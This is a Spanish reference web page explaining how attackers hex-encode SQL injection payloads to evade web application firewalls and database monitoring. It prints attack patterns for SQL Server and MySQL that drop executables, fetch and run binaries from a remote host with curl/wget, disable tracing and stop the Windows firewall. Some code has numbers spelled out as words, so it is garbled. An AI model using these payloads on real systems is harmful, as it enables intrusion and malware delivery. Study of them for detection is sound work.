ıllı Internet y Tecnologías de la Información (2018)

internet, Hosting, dominios, seo, antivirus, banco de imágenes, páginas web, tiendas online

[Enciclopedia Online Gratuita] Diccionario de Internet y Tecnologías de la Información y la Comunicación (TIC):

ıllı Ofuscación SQL wiki: info, historia y vídeos

videos internet

salud  Ofuscación SQL 


La Ofuscación SQL es uno de los primordiales métodos empleado por los piratas informáticos para acceder a bases de datos.


Al estar al corriente de los controles de seguridad que resguardan los activos digitales, los atacantes habitualmente utilizan técnicas de evasión para pasar inadvertidos y montar su ataque sin ser detectados y bloqueados por mecanismos de seguridad. Una de las técnicas de evasión más populares, aplicable sobre todo contra los mecanismos de seguridad basados en patrones es la ofuscación, produciendo una instancia del ataque que hace fundamentalmente lo que el ataque está destinado a hacer, mas está desarrollado intencionalmente para verse muy, muy diferente del patrón del control de seguridad busca.


Por ejemplo, la ofuscación de sentencias de SQL (nos referimos a esto después como ofuscación de SQL) es muy habitual como un medio para evitar los firewalls de aplicaciones web (WAF) y ejecutar ataques de inyección SQL, y confundir las soluciones de monitoreo de actividad de base de datos, (DAM) que examinan el tráfico de la base de datos SQL Esta técnica es común entre atacantes, herramientas de automatización y pen testers para ejecutar implícitamente comandos SQL contra bases de datos.


Uno de los métodos más habituales para sostener un ataque de inyección SQL es el empleo de codificación SQL HEX, donde las transacciones de SQL "inteligibles" de texto plano se transforman en caracteres HEX o bien hexadecimales (0-nueve, AF), lo que hace que sean ininteligibles y más bastante difíciles de monitorear por DAM y soluciones de firewall de base de datos (DBF). Por tanto, una "selección * de claves de acceso" en una solución DAM se vería así: "73656C656374202A2066726F6D2070617373776F726473".


Patrones de ataques SQL codificados en HEX


En base a análisis de datos, advertimos múltiples patrones de ataques SQL codificados en HEX. Sorprendentemente, una de cada 5 consultas de ataque en SQL Server aprovechó las técnicas de codificación HEX. Este género de ataque es menos común para las bases de datos MySQL.


Ejemplo en Microsoft SQL Server


El siguiente es el patrón más habitual de un ataque SQL codificados en HEX contra SQL Server:

Pattern1:declare@avarchar(ocho mil);set@a=0x<hex_string>;exec(@a);

en el ejemplo precedente, los comandos de ataque se ponen en la variable a, cuando están codificados como una cadena HEX. Ahora, los comandos obsesionados se ejecutan a través de la instrucción exec(@a). Tras las consultas con codificación HEX hallamos múltiples géneros de ataques. Este es otro ejemplo de una consulta HEX que observamos en Microsoft SQL Server:

Pattern2:DECLARE@ObjectTokenINT;EXECsp_OACreate'(quinientos sesenta y seis-cero-diez-ocho mil-00AA006D2EA4)',@ObjectTokenOUTPUT;EXECsp_OASetProperty@ObjectToken,'Type',1;EXECsp_OAMethod@ObjectToken,'Open';EXECsp_OAMethod@ObjectToken,'Write',NULL,0x<hex_string>;EXECsp_OAMethod@ObjectToken,'SaveToFile',NULL,"Filename",2;EXECsp_OAMethod@ObjectToken,'Close';EXECsp_OADestroy@ObjectToken;

El Transact-SQL precedente (T-SQL) entrega una carga maliciosa a un sistema objetivo. Crea y escribe un fichero (en general un fichero ejecutable o bien DLL) en una localización concreta en un sistema de destino. El ataque se efectuó usando el objeto ADODB.Stream (que tiene un identificador de clase de '00000566-cero-diez-ocho mil-00AA006D2EA4') y procedimientos guardados de automatización OLE (sp_OA). Los procedimientos OLE le dejan trabajar con objetos COM desde T-SQL. Puede utilizar estos procedimientos para crear objetos COM y utilizar los métodos y propiedades de ese objeto. Por servirnos de un ejemplo, use el objeto Sistema de ficheros para abrir, leer y redactar ficheros de manera directa en T-SQL.


Ejemplo en MySQL


En base al análisis de ataques a MySQL, advertimos 3 patrones de consultas con codificación HEX. Estos patrones procuran dar una carga útil a un sistema objetivo mediante comandos SQL.

pattern1:CREATETABLE<table_name>(<column_name>LONGBLOB)set@a=concat('',0x<hex_string>);UPDATE<table_name>set<column_name>=@aselect<column_name>from<table_name>intoDUMPFILE<filename>droptableIFEXISTS<table_name>Pattern2:CREATETABLE<table_name>(<column_name>BLOB);INSERTinto<table_name>values(CONVERT(0X<hex_string>,?)SELECT<column_name>FROM<table_name>INTODUMPFILE<filename>droptable<table_name>

La compilación de comandos en Pattern 1 y dos carga un ejecutable portátil (PE) con codificación HEX en una tabla y después lo extrae en un fichero en un sistema de destino.

Pattern3:setgloballog_bin_trust_function_creators=1;selectunhex('hex_string')intodumpfile<file_name>;createfunction<func_name>returnsstringsoname"<file_name>";select<func_name>('cd <dir>;curl -0 http://<ip>:<port>/<PE>;chmod setecientos setenta y siete <PE>;./<PE>;');select<func_name>('cd <dir>;wget http://<ip>:<port>/<PE>;chmod setecientos setenta y siete <PE>;./<PE>;');

La compilación de comandos en Pattern tres, decodifica y carga un fichero DLL en un fichero en un sistema de destino. Entonces, crea una nueva función SQL que radica en la DLL entregada y ejecuta la función usando el comando SELECT. Esta función descarga y guarda otro ejecutable en una localización concreta, cambia sus permisos a '777' (todos pueden leer redactar y ejecutar) y por último lo ejecuta.


Consultas ofuscadas


Las consultas con codificación HEX se emplean de manera frecuente contra MySQL y MS SQL Server como métodos avanzados de conversión de binario a hexadecimal para dar una carga a un sistema de destino por medio de comandos SQL. En el momento en que la carga útil está en el sistema de destino, transforma de formato hexadecimal a un ejecutable binario y después se ejecuta.


Las consultas con codificación HEX asimismo se emplean para alterar las configuraciones de seguridad de la base de datos para acrecentar una superficie de ataque.En general, se manifiestan en servicios y peculiaridades habilitantes. Las próximas consultas habilitan opciones avanzadas y desactivan el rastreo predeterminado. El seguimiento predeterminado da un registro de actividad rico y persistente y cambios relacionados primordialmente con las opciones de configuración. Entonces recobran información sobre todos y cada uno de los indicios existentes utilizando el procedimiento fn_trace_getinfo y después los detienen.

execsp_configure'show advanced options'.1;reconfigure;execspconfigure'default trace enabled',0;reconfigure:declare@iint,@sizeint;set@i=1;select@size=max(traceid)from::fn_trace_getinfo(default);while@i<=@sizebeginexecsp_trace_setstatus@i,0;set@i=@i+1;end;

Además, los ataques en MS SQL que tenían el propósito de supervisar los servicios de Microsoft-Windows-SharedAccess y SQL Server Agent por medio de la llamada del procedimiento xp_servicecontrol(). Los ataques detienen el servicio Microsoft-Windows-SharedAccess, que es responsable del empleo compartido de la conexión a Internet. Esta acción realmente detiene el Firewall de Windows.

execxp_servicecontrol'stop','sharedaccess';

Además, los atacantes utilizan el procedimiento xp_servicecontrol() para empezar un servicio del Agente SQL Server que ejecuta trabajos SQL que poseen más comandos de ataque.

execxp_servicecontrol'start','SQLSERVERAGENT';


  ELIGE TU TEMA DE INTERÉS: 


autoayuda.es   Internet y Tecnologias 

Está aquí: Inicio > [ INTERNET ] > ıllı Ofuscación SQL wiki: info, historia y vídeos

Las cookies nos permiten ofrecer nuestros servicios. Al utilizar nuestros servicios, aceptas el uso que hacemos de las cookies. Ver políticas